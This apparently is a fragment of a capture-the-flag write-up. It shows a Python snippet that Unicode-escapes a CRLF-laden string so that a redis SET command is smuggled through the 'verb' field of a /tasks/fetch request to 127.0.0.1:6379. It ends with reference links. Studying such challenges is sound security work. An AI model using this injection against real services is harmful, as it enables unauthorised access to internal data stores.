task_id = 'd3ae97dd-8ed9-4b72-ad47-4c785f2302f0'

write_file(task_id)
get_key(task_id)
shutdown(task_id)
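
The escaping performed by wapper can be verified with a short round trip. to_unicode_escapes is a hypothetical, more compact equivalent; the sketch assumes the escaped string is pasted into the JSON verb field of the /tasks/fetch request, and it only handles characters in the Basic Multilingual Plane.

```python
import json


def to_unicode_escapes(text: str) -> str:
    """Escape every character as \\uXXXX, like wapper does for its output."""
    return "".join(f"\\u{ord(ch):04x}" for ch in text)


command = "\r\nset asd '{\"k\": \"v\"}'\r\nGET"
escaped = to_unicode_escapes(command)

# Embed the escaped text in a JSON body and let the JSON parser undo it.
body = '{"url":"http://127.0.0.1:6379","verb":"' + escaped + '"}'
decoded = json.loads(body)["verb"]
print(escaped[:24], decoded == command)
```

Since every quote and backslash is escaped, the JSON layer needs no manual quoting, and the server side receives exactly the intended redis command.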

References

https://snyk.io/blog/python-rce-vulnerability/

http://gensokyo.cn/2025/10/19/celerace/